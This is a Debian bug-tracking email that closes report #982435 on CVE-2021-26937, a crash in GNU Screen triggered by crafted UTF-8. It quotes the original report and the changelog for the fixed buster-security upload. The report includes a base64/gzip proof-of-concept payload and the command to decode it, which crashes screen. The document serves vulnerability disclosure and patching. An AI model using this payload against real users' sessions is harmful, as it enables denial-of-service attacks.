Your message dated Wed, 24 Feb 2021 17:33:44 +0000 with message-id <e1ley2i-000d2p...@fasolo.debian.org> and subject line Bug#982435: fixed in screen 4.6.2-3+deb10u1 has caused the Debian Bug report #982435, regarding screen: CVE-2021-26937 to be marked as done.
This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 982435: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=982435 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems
--- Begin Message ---Source: screen Version: 4.8.0-3 Severity: grave Tags: security upstream Forwarded: https://lists.gnu.org/archive/html/screen-devel/2021-02/msg00000.html X-Debbugs-Cc: car...@debian.org, Debian Security Team <t...@security.debian.org> Hi, The following vulnerability was published for screen, filling it for now as RC severity, feel free to downgrade if you disagree. CVE-2021-26937[0]: | encoding.c in GNU Screen through 4.8.0 allows remote attackers to | cause a denial of service (invalid write access and application crash) | or possibly have unspecified other impact via a crafted UTF-8 | character sequence. To reproduce the issue and crash screen: $ cat poc.base64 H4sIAD7OImACA02W61IiQQyFX10WpkdZF5QFF4TVWbkoKpcZVuQyMM/iD99DTPM1p4qiTp1O0klO OvDp3Mf3p/gsio+4ZqB9+D4ybm+gJ8y7gesTEyffwG2EiQ3ci9fGwOLERAsDffGaGYiFiQx0JE6O TZk4SwOZePmjW/F6MZAK4yO/ideVAani2JZ/wpwZOBMvqyIuhHkyUDkyriRHXUDJjoLXOyASY+v8 3gnTImf0igriwBzb8io5Nw2MyWcoR3PA1EBZ1EkN5GJsKhdbYTpoGm7/YeBScm7S1T1MRg8HeFWs UumhuwDcAcJkmtyuivEf8fLzox0b0I2EozLqbC3OCuMZ/dnB1CVyDHglsu/Pi9wVUu1RYELkcORn Yy2Rn+3S/8JcERB1Ij/zN3LXFr3GMI8GErE5N9CE2RD5r9j4V6m3twBv2Pj3VZPZ2DO0QfcbA12J 7BW8E8bvjQl9Hsilv7CZACygzacxD4CUQRqJe8MAUrowCQdQZyA98yz5FGySDu5N5jDU1ebtRHhV AHVsJlyxgumicninGVO3wX3MZI643XdM1oVL2S1hP484eiB53425ePWR2yHTBCY8qyXTkhI5533l yH3BFvXlhL0RhOtjc9iQJfLJ2VGMsTfe70SdMOENbPz0NkQd/4iepC5qjzsw57Qu6JWRD5XGbZIP PRwaCAukTM6J5LxArwSmxLYJHXN0w/GIlhj/BqzYkFu8PDOVugYoWGPBZjTzDuAv/SlvOeLSUPsQ Y0bUrQ084tU7lRORz3GBzFlxGe4t8WInxGu8qsw8izGuMhJlNm1KOSHDW+6ih+7SwFK6ERK7ZoEs sLE4Lvw92InXPerk5DNlfixDJz8K0ZxGxSg484P6Be3RyjwMCQAA $ base64 -d poc.base64 | gzip -d - If you fix the vulnerability please also make sure to include the CVE (Common Vulnerabilities & Exposures) id in your changelog entry. For further information see: [0] https://security-tracker.debian.org/tracker/CVE-2021-26937 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26937 [1] https://lists.gnu.org/archive/html/screen-devel/2021-02/msg00000.html [2] https://www.openwall.com/lists/oss-security/2021/02/09/3 [3] https://savannah.gnu.org/bugs/?60030 Regards, Salvatore
--- End Message ---
--- Begin Message ---Source: screen Source-Version: 4.6.2-3+deb10u1 Done: Axel Beckert <a...@debian.org> We believe that the bug you reported is fixed in the latest version of screen, which is due to be installed in the Debian FTP archive. A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to 982...@bugs.debian.org, and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Axel Beckert <a...@debian.org> (supplier of updated screen package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@ftp-master.debian.org) -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Format: 1.8 Date: Sat, 20 Feb 2021 21:59:38 +0100 Source: screen Architecture: source Version: 4.6.2-3+deb10u1 Distribution: buster-security Urgency: high Maintainer: Axel Beckert <a...@debian.org> Changed-By: Axel Beckert <a...@debian.org> Closes: 982435 Changes: screen (4.6.2-3+deb10u1) buster-security; urgency=high . * [CVE-2021-26937] Fix invalid write access and application crash or possibly unspecified other impact via a crafted UTF-8 character sequence. (Closes: #982435) Checksums-Sha1: 9b0bc2089e7af72bf52010615e2316ed5de8b849 2344 screen_4.6.2-3+deb10u1.dsc 0434d4c45d0b5bb339551511e10a9b2c4ec6a789 845210 screen_4.6.2.orig.tar.gz 024239ed073a50e383185ee1e8d6b755aaeff8ca 879 screen_4.6.2.orig.tar.gz.asc 726b3db75de2e0f3e8eb75c208a5c44e3ac34b09 47732 screen_4.6.2-3+deb10u1.debian.tar.xz c8563933b16968b6d747f737f3e96a7cc80836a1 6736 screen_4.6.2-3+deb10u1_source.buildinfo Checksums-Sha256: 148626d94c58fbb93ee4e574f8e6ab10aa80d76316823c88e888d361af428bf3 2344 screen_4.6.2-3+deb10u1.dsc 1b6922520e6a0ce5e28768d620b0f640a6631397f95ccb043b70b91bb503fa3a 845210 screen_4.6.2.orig.tar.gz 3e88b06e8ec3a24860bae77f1578d555194faa86049a0da899a00fe8bd218a40 879 screen_4.6.2.orig.tar.gz.asc b18b9fdd4389d004cbee1eec691ab3e5702a072cd6e10f03995e358292ebee23 47732 screen_4.6.2-3+deb10u1.debian.tar.xz 45a7e88671d89994154b09944738da21d80b6d682da3ecce809d602bfb93abcf 6736 screen_4.6.2-3+deb10u1_source.buildinfo Files: 3071a644f67ac4684eb7017e2a448024 2344 misc standard screen_4.6.2-3+deb10u1.dsc a0f529d3333b128dfaa324d978ba73a8 845210 misc standard screen_4.6.2.orig.tar.gz d81a6ad00d88b2721915809480c8c62d 879 misc standard screen_4.6.2.orig.tar.gz.asc e41cca61a5c18102862a359da42a6342 47732 misc standard screen_4.6.2-3+deb10u1.debian.tar.xz 904cd09bbbcac5f5008aa4c7a4feed76 6736 misc standard screen_4.6.2-3+deb10u1_source.buildinfo -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEERoyJeTtCmBnp12Ema+Zjx1o1yXUFAmAxfjkACgkQa+Zjx1o1 yXUdBQ//eI9NzuZ+N5mmu9poc7XcfUYJxkadtR/mVdA2Lc6wX30htS3f68U4AGNH M4MNoep6LjXzIJpQTtCR5HzUWQ5vCRqhb+PEYSZuLKN25ylAP4/ZLkz0jx8ThoU+ eBGlA5KDUym+ausimlzNTKtXI4Di8+MsIbmce2ngecvYSRzzGh7andoY6LqWkOMT MWmNwZLZNhj+yA4F8VEzz8e6cxQNtABTTDNSazHObDCMpgNT/nPkAd3bEFkTdtGl CNE4M+KyVfnktrcWdMBHWFx3pLMCojQLih06TgMFO+34a6N8KUArHrgLkNprdvMD Cen4BpIuP1k72da3+XiZ3kvBH8z44TtG6rcW7F9d7Ra6Eth0YqTjkE/01HnKOMIS kRAIXifAzFN4IZ+KqypPwuzKp+egUG6Xroarefbs3hcb8aZAxM893wcdex7uGl4J 7TLJ+DJzrqa2qiKww1M4MzMA8lYw5rb0t+XMrRGKmwsXqjYKeIsPmGQQaGZL5vMA v6rKYDObEgl2mcDm+TRPeQpPtNfQ4TjBdjz4sPVj7SmoBm+FzebWDWQ5YVhlhrVG W8KczFUqE5uy0Tp48xvAhEjVkETX38rb6J78s3KdYzddCGDHznBFiJ7nKfm2u0fo WusSg3tHraH01iqj1qxG8VuuTs5iq0OOGTLqrxd3YAbVJCQrNs8= =eXdY -----END PGP SIGNATURE-----
--- End Message ---
